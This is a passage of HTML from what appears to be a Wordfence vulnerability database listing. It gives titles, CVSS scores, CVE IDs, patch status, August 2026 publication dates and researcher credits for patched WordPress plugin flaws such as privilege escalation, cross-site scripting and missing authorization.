<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/haitam-lazaar" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c50973081ac6e68d2a8344fbd0608368.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c50973081ac6e68d2a8344fbd0608368"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/haitam-lazaar" target="_blank" rel="noopener">Haitam Lazaar</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/20f0058b-ccc2-45e7-bce1-8f5debefc3aa" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a87498c5-167f-4871-9c2f-4ada82c2b727" target="_blank" rel="noopener">Fluent Forms Pro Add On Pack &lt;= 6.2.12 &#8211; Authenticated (Subscriber+) Privilege Escalation</a></h4>
<div class="cvss-score-badge">6.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81297" target="_blank" rel="noopener noreferrer">							CVE-2026-81297						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluentformpro" target="_blank" rel="noopener">Fluent Forms Pro Add On Pack</a> <span class="wfvr-software-slug">[fluentformpro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a87498c5-167f-4871-9c2f-4ada82c2b727" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1ee5868f-7240-45ca-9f8a-b1489b2cc21c" target="_blank" rel="noopener">Forminator Forms – Contact Form, Payment Form &amp; Custom Form Builder &lt; 1.57.0.7 &#8211; Authenticated (Custom Role+) Privilege Escalation</a></h4>
<div class="cvss-score-badge">6.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19222" target="_blank" rel="noopener noreferrer">							CVE-2026-19222						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/forminator" target="_blank" rel="noopener">Forminator Forms – Contact Form, Payment Form &amp; Custom Form Builder</a> <span class="wfvr-software-slug">[forminator]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thanh-lam-tang" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/0d11336c7d3499be8c645e73493a54cf.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0d11336c7d3499be8c645e73493a54cf"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thanh-lam-tang" target="_blank" rel="noopener">Thanh Lam Tang</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1ee5868f-7240-45ca-9f8a-b1489b2cc21c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ee49e76a-fc6f-4c23-ac44-29625b1d5000" target="_blank" rel="noopener">MStore API – Create Native Android &amp; iOS Apps On The Cloud &lt; 4.21.1 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">6.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18234" target="_blank" rel="noopener noreferrer">							CVE-2026-18234						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mstore-api" target="_blank" rel="noopener">MStore API – Create Native Android &amp; iOS Apps On The Cloud</a> <span class="wfvr-software-slug">[mstore-api]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener">Erwan LR</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ee49e76a-fc6f-4c23-ac44-29625b1d5000" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f53b6449-fefc-44f3-b44d-e92749876e1a" target="_blank" rel="noopener">Post SMTP – Complete Email Deliverability and SMTP Solution with Email Logs, Alerts, Backup SMTP &amp; Mobile App  4.0.0-beta.1 &#8211; Missing Authorization to Authenticated (Subscriber+) Settings Change</a></h4>
<div class="cvss-score-badge">6.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81278" target="_blank" rel="noopener noreferrer">							CVE-2026-81278						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 26, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/post-smtp" target="_blank" rel="noopener">Post SMTP – Complete Email Deliverability and SMTP Solution with Email Logs, Alerts, Backup SMTP &amp; Mobile App</a> <span class="wfvr-software-slug">[post-smtp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/robert-hartinger" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3a44d04cdd3490b305d8f18cf157f1fd.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3a44d04cdd3490b305d8f18cf157f1fd"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/robert-hartinger" target="_blank" rel="noopener">mad4cyber</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f53b6449-fefc-44f3-b44d-e92749876e1a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fdb276aa-785f-4655-8843-29e82b0ad92c" target="_blank" rel="noopener">User Registration &amp; Membership – Free &amp; Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration &amp; Login Builder &lt; 5.2.6 &#8211; Authenticated (Custom Role+) Privilege Escalation</a></h4>
<div class="cvss-score-badge">6.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-79996" target="_blank" rel="noopener noreferrer">							CVE-2026-79996						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration" target="_blank" rel="noopener">User Registration &amp; Membership – Free &amp; Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration &amp; Login Builder</a> <span class="wfvr-software-slug">[user-registration]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/66ac278d7e3fc457bdbe731edc3c5364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="66ac278d7e3fc457bdbe731edc3c5364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener">Artus KG</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fdb276aa-785f-4655-8843-29e82b0ad92c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a40e7a88-11f2-4fa8-856b-bda3ebcbae56" target="_blank" rel="noopener">ElementsKit Pro &lt;= 4.10.1 &#8211; Unauthenticated Stored Cross-Site Scripting via &#8216;s&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-4246" target="_blank" rel="noopener noreferrer">							CVE-2026-4246						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/elementskit" target="_blank" rel="noopener">ElementsKit Pro</a> <span class="wfvr-software-slug">[elementskit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ren-voza" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8e8a01bf0b9d95d7919748a0a689fb3c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8e8a01bf0b9d95d7919748a0a689fb3c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ren-voza" target="_blank" rel="noopener">Ren Voza</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a40e7a88-11f2-4fa8-856b-bda3ebcbae56" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a56d1a9e-7564-41b0-af03-c272ffbbbb97" target="_blank" rel="noopener">Events Manager &lt;= 7.4.0.1 &#8211; Reflected Cross-Site Scripting via &#8216;header_format&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17089" target="_blank" rel="noopener noreferrer">							CVE-2026-17089						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/events-manager" target="_blank" rel="noopener">Events Manager – Calendar, Bookings, Tickets, and more!</a> <span class="wfvr-software-slug">[events-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a56d1a9e-7564-41b0-af03-c272ffbbbb97" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/019893b8-bef1-46de-b38e-c5ebabacb878" target="_blank" rel="noopener">GeotargetingWP &lt; 3.5.6.2 &#8211; Reflected Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14307" target="_blank" rel="noopener noreferrer">							CVE-2026-14307						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/geotargetingwp" target="_blank" rel="noopener">GeotargetingWP</a> <span class="wfvr-software-slug">[geotargetingwp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/andrew-gomez" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5e0deed32e14b877a67ce3b9e0bf3b49.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5e0deed32e14b877a67ce3b9e0bf3b49"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/andrew-gomez" target="_blank" rel="noopener">andrew gomez</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/019893b8-bef1-46de-b38e-c5ebabacb878" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ef4dad25-f1e1-401c-91c3-525c045bddf6" target="_blank" rel="noopener">AI Engine – The Chatbot, AI Framework &amp; MCP for WordPress 3.4.0 &#8211; 3.7.1 &#8211; Missing Authorization to Unauthenticated Arbitrary AI Query Execution</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-75798" target="_blank" rel="noopener noreferrer">							CVE-2026-75798						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ai-engine" target="_blank" rel="noopener">AI Engine – The Chatbot, AI Framework &amp; MCP for WordPress</a> <span class="wfvr-software-slug">[ai-engine]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8f2147d3a162aeba1f2416afc4c0274c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8f2147d3a162aeba1f2416afc4c0274c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem" target="_blank" rel="noopener">Abdullah Kareem</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ef4dad25-f1e1-401c-91c3-525c045bddf6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/83a2dcbb-bd7d-49b2-ab90-38e76679ae2f" target="_blank" rel="noopener">Booking and Rental Manager for Bike | Car | Resort | Appointment | Dress | Equipment &lt;= 2.7.5 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78258" target="_blank" rel="noopener noreferrer">							CVE-2026-78258						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booking-and-rental-manager-for-woocommerce" target="_blank" rel="noopener">Booking and Rental Manager for Bike | Car | Resort | Appointment | Dress | Equipment</a> <span class="wfvr-software-slug">[booking-and-rental-manager-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bao-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/73f53dafd32993ac7c0157a4e6729638.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="73f53dafd32993ac7c0157a4e6729638"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bao-2" target="_blank" rel="noopener">Bao</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/83a2dcbb-bd7d-49b2-ab90-38e76679ae2f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/64ea54e2-0394-4017-a4d4-d96df424aa3f" target="_blank" rel="noopener">Booking for Appointments and Events Calendar – Amelia &lt; 2.4.7 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14216" target="_blank" rel="noopener noreferrer">							CVE-2026-14216						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 26, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ameliabooking" target="_blank" rel="noopener">Booking for Appointments and Events Calendar – Amelia</a> <span class="wfvr-software-slug">[ameliabooking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/manuel-martinez-casasola" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8518b5284cbd27f6cda0bbaa16c20469.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8518b5284cbd27f6cda0bbaa16c20469"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/manuel-martinez-casasola" target="_blank" rel="noopener">Manuel Martínez Casasola</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/64ea54e2-0394-4017-a4d4-d96df424aa3f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f7eb440f-c122-4e78-9ea0-513a4cf9794d" target="_blank" rel="noopener">Booking Package &lt; 1.7.25 &#8211; Unauthenticated Price Manipulation</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16986" target="_blank" rel="noopener noreferrer">							CVE-2026-16986						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booking-package" target="_blank" rel="noopener">Booking Package</a> <span class="wfvr-software-slug">[booking-package]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3bfe6fa6dcd46d4fe2d2e08ff44bcd5d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3bfe6fa6dcd46d4fe2d2e08ff44bcd5d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala-2" target="_blank" rel="noopener">Muni Nitish Kumar Yaddala</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f7eb440f-c122-4e78-9ea0-513a4cf9794d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6d9734bd-54de-44ab-b369-7a9d9a9e0e29" target="_blank" rel="noopener">Breeze Cache &lt; 2.5.13 &#8211; Unauthenticated File Creation via Path Traversal</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-79706" target="_blank" rel="noopener noreferrer">							CVE-2026-79706						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/breeze" target="_blank" rel="noopener">Breeze Cache</a> <span class="wfvr-software-slug">[breeze]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6d9734bd-54de-44ab-b369-7a9d9a9e0e29" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4978261d-0ec8-42de-af50-f02032689595" target="_blank" rel="noopener">Catfolders Document Gallery Pro &lt; 2.0.7 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19430" target="_blank" rel="noopener noreferrer">							CVE-2026-19430						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
